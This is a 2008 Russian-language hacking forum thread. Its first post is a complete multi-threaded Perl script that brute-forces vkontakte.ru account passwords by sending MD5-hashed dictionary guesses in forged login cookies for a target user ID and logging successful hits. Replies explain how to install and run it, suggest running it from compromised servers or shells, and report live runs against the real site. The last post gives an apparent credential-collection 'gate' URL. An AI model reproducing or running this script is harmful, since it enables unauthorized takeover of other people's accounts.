vkontakte brutforce

Discussion in 'Уязвимости' started by OptimaPrime, 31 Jan 2008.

  1. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Code:
    #!/usr/bin/perl
    
    use IO::Socket;
    use MD5;
    use threads;
    use threads::shared;
    my @pass : shared;
    
    ######################################
    # C!klodoL
    # vkontakte.ru bruteforce with multi-threads
    ######################################
    $dic = 'passl.txt';		#словарь паролей
    $id = 111111;		#id цели
    $mail = 'mail%40mail.com';	#мыло, вместо @ вписать %40
    $threads = 4;		#количество потоков
    ######################################
    
    open (pass, "<$dic");
    
    Next:
    @pass = pass();
    
    for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
    for(@trl) { $_->join; }
    
    sub Brut
    {
    
    while (@pass){
    
    $pass = shift @pass;
    
    $md5 = MD5->hexhash($pass);
    $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
    print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
    	"Host: vkontakte.ru\r\n".
                "Accept: */*\r\n".
                "Content-Type: application/x-www-form-urlencoded\r\n".
                "User-Agent: Mozillo\r\n".
                "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
                "Connection: close\r\n\r\n";
    $answ = <$sock>;
    close $sock;
    print "$pass  $answ";
    if ($answ =~ /302/){
    open (good, '>>good.txt');
    print good "$id:$pass:$md5\n";
    print "$id:$pass:$md5\n";
    close good;
    exit;}
    }
    
    }
    
    goto Next;
    
    sub pass
    {
    	my (@mas);
    	while (<pass>){
    	push @mas, $_;
    	last if (@mas == 400);
    	}
    	chomp @mas;
    	return @mas;
    }
     
    10 people like this.
  2. S1ash

    S1ash Banned

    Joined:
    19 Nov 2007
    Messages:
    29
    Likes Received:
    2
    Reputations:
    -10
    Супер.. ништяк.. скорость отпад.. даже на неполных 256 кб/с
    респект!
     
  3. GreenTiger

    GreenTiger Banned

    Joined:
    7 Dec 2007
    Messages:
    62
    Likes Received:
    10
    Reputations:
    0
    Gui версии уже как 2 месяца... а вы перл юзаете
     
  4. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    а нах гуи под консолью, темболее когда сеть дедиков брутит?
     
  5. CyberTm

    CyberTm Elder - Старейшина

    Joined:
    29 Oct 2007
    Messages:
    43
    Likes Received:
    3
    Reputations:
    0
    Выложи сюда ссылки пож
     
  6. E}I{uk

    E}I{uk New Member

    Joined:
    8 Aug 2006
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    А как это все юзать?
     
  7. Pir4tt

    Pir4tt Elder - Старейшина

    Joined:
    3 Jan 2008
    Messages:
    73
    Likes Received:
    36
    Reputations:
    5
    Установи Active Perl если для окошек (ну или серв какой нить если оч хоцца), сохрани текс кода в файл Brut.pl, и запусти, отредактировав входные данные (мыло/йд/файлспассами), как вариант залей на шелл..
     
  8. Digital Cat

    Digital Cat Banned

    Joined:
    4 Feb 2008
    Messages:
    75
    Likes Received:
    78
    Reputations:
    0
    С активперла с проксями может не сработать вроде... О_о Если я ошиблась, поправьте) Именно этот плоит не юзала, каюсь)
     
    2 people like this.
  9. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Просто ради теста прогоняю со своей тачки без проксей: один пароль сдался через 2 минуты, другой минут 20 брутился, пока в ответку Outpost не сообщил:

    06.02.2008 23:37:58 Сканирование портов 195.190.105.235 TCP (4084, 4082, 4083, 4080, 4074, 4075)
    06.02.2008 23:37:58 Rst атака 195.190.105.235 -> 195.190.105.235

    195.190.105.235 = vkontakte.ru :)))
    Вот так вот, vkontakte.ru практикует DOS-атаки своих пользователей? А вдруг я свой забытый пароль перебираю? Беспредельщики!
    Короче смотрите на палитесь, а то еще забанят.
     
    #9 diehard, 7 Feb 2008
    Last edited: 7 Feb 2008
  10. Grini

    Grini Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    24
    Likes Received:
    12
    Reputations:
    0
    хм..я у себя в виде теста брутил..и ниче мне на мыло не пришло..хм
     
  11. Grini

    Grini Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    24
    Likes Received:
    12
    Reputations:
    0
    кстати да))в виде теста в строчке "$id = 111111" сотрите 5 едениц..клин клином вышибают :)
     
  12. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Grini
    А тебе и не должно ничего на мыло приходить.
     
  13. Grini

    Grini Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    24
    Likes Received:
    12
    Reputations:
    0
    а зачем там мыло писать надо?
    И вытикающий вопрос)Где появляется пасс?
     
  14. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    читай скрипт
    good, '>>good.txt');

    следовательно в фаиле good.txt))
     
  15. Grini

    Grini Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    24
    Likes Received:
    12
    Reputations:
    0
    почему же он мой пароль не распознает?)я на себе тестю,а он пробегает мой пароль,пишет ок и все)где этот гуд.ТиксТ появляется?в папке с самим файликом как я понимаю должен,но его нет :(
    кстати скрипт русские буквы,запятые распознает?может причина в этом?
     
  16. Pir4tt

    Pir4tt Elder - Старейшина

    Joined:
    3 Jan 2008
    Messages:
    73
    Likes Received:
    36
    Reputations:
    5
    читаем первый пост внимательнее
     
  17. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Grini

    Исходник почитай хотя бы, прежде чем запускать.
    Мыло на вконтакте.ру используется в качестве логина. Скрипт посылает серверу запрос подсовывая левые куки : [ид, мыло, мд5(пароля)]. Когда сервер даёт добро, скрипт завершает работу и пишет отчет в good.txt
    Видимо ты даешь неправильные данные (ид, мыло или пароль)
     
  18. Grini

    Grini Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    24
    Likes Received:
    12
    Reputations:
    0
    спасибо,разобрался :)
     
  19. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Упс
     
    #19 banned, 11 Feb 2008
    Last edited: 11 Feb 2008
    1 person likes this.
  20. Hellsp@wn

    Hellsp@wn Elder - Старейшина

    Joined:
    29 Apr 2007
    Messages:
    401
    Likes Received:
    153
    Reputations:
    48
    ужс какой :)

    [​IMG]

    гейт: www.poncher.110mb.com/my/rtest/e.php
     
    #20 Hellsp@wn, 11 Feb 2008
    Last edited: 11 Feb 2008